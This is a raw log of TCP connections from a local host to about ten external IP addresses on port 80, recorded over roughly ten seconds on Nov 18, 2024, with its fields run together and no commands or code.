                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.415487051 CET805020434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.415502071 CET805020434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.232258081 CET805020354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.232439995 CET5020380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.237910032 CET805020354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.237962961 CET5020380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.244376898 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.249397993 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.249471903 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.249564886 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.249586105 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.250164986 CET805020434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.250334978 CET5020480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.254515886 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.254528046 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.258244038 CET805020434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.258299112 CET5020480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.265690088 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270724058 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270792961 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270921946 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270942926 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.276076078 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.276087046 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.935749054 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.940337896 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.945693970 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.947114944 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.040327072 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.045502901 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.045568943 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.061970949 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.062000990 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.067070961 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.067163944 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.084543943 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.098588943 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.104300976 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.104351997 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.162497997 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.168745041 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.168808937 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.191273928 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.191308022 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.197149038 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.197160959 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.903992891 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.949634075 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.023777962 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.023907900 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.496375084 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.502466917 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.639918089 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.644614935 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.650114059 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.650182962 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.709284067 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.714767933 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.714845896 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.725158930 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.725194931 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.730187893 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.730201960 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.754843950 CET5021080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.760287046 CET805021047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.760373116 CET5021080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.918979883 CET5021080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.919009924 CET5021080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.924140930 CET805021047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.924154997 CET805021047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.610706091 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.611502886 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.619194031 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.619240999 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.634320974 CET5021180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.639168978 CET805021154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.639269114 CET5021180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.639595985 CET5021180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.639612913 CET5021180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.644391060 CET805021154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.644500971 CET805021154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.219993114 CET805021047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.220350981 CET5021080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.225666046 CET805021047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.225739956 CET5021080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.234051943 CET5021280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.238987923 CET805021244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.239054918 CET5021280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.239149094 CET5021280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.239182949 CET5021280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.244168997 CET805021244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.244179964 CET805021244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.470458984 CET805021154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.470647097 CET5021180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.476139069 CET805021154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.476247072 CET5021180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.485888958 CET5021380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.491030931 CET805021334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.491322994 CET5021380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.491488934 CET5021380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.491511106 CET5021380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.496660948 CET805021334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.497123003 CET805021334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.900885105 CET805021244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.901487112 CET5021280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.907489061 CET805021244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.908791065 CET5021280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.915348053 CET5021480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.920795918 CET805021444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.920943975 CET5021480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.920943975 CET5021480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.921730995 CET5021480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.925973892 CET805021444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.926646948 CET805021444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.315524101 CET805021334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.315834045 CET5021380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.321432114 CET805021334.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.321480989 CET5021380192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.330342054 CET5021580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.335613966 CET805021547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.335690022 CET5021580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.335828066 CET5021580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.335860014 CET5021580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.340706110 CET805021547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.340718031 CET805021547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.602019072 CET805021444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.606292009 CET5021480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.612150908 CET805021444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.613775015 CET5021480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.620796919 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.626087904 CET805021618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.629940987 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.630038977 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.630055904 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.635035992 CET805021618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.635050058 CET805021618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.810934067 CET805021547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.811160088 CET5021580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.818166971 CET805021547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.818243980 CET5021580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.827496052 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832470894 CET805021754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832545042 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832655907 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832683086 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.837713003 CET805021754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.837735891 CET805021754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.086834908 CET805021618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.086991072 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.093085051 CET805021618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.093141079 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.099014997 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.103921890 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.104008913 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.104089022 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.104096889 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.109232903 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.109244108 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.449923992 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.453860044 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460361958 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460453033 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460719109 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460747957 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.468554974 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.468569994 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.776149035 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.776381969 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.782356977 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.782422066 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.789462090 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.794532061 CET805022044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.794603109 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.794714928 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.794730902 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.799537897 CET805022044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.799863100 CET805022044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.312161922 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.312345028 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.318042994 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.318089962 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.328114033 CET5022180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.333270073 CET80502213.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.333339930 CET5022180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.333453894 CET5022180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.333477974 CET5022180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.338303089 CET80502213.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.338344097 CET80502213.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.476463079 CET805022044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.476660967 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.483338118 CET805022044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.483386993 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.489379883 CET5022280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.494671106 CET805022213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.494759083 CET5022280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.494822979 CET5022280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.494841099 CET5022280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.500504971 CET805022213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.500516891 CET805022213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.008831024 CET80502213.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.009071112 CET5022180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.015609026 CET80502213.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.015693903 CET5022180192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.030392885 CET5022380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.035242081 CET805022318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.035442114 CET5022380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.035610914 CET5022380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.035638094 CET5022380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.040600061 CET805022318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.040709972 CET805022318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.717232943 CET805022318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.717729092 CET5022380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.723063946 CET805022318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.723423004 CET5022380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.733170986 CET5022480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.738282919 CET805022418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.738389969 CET5022480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.738606930 CET5022480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.738622904 CET5022480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.743537903 CET805022418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.743634939 CET805022418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.944873095 CET805022213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.945023060 CET5022280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.950890064 CET805022213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.950942993 CET5022280192.168.2.1013.251.16.150
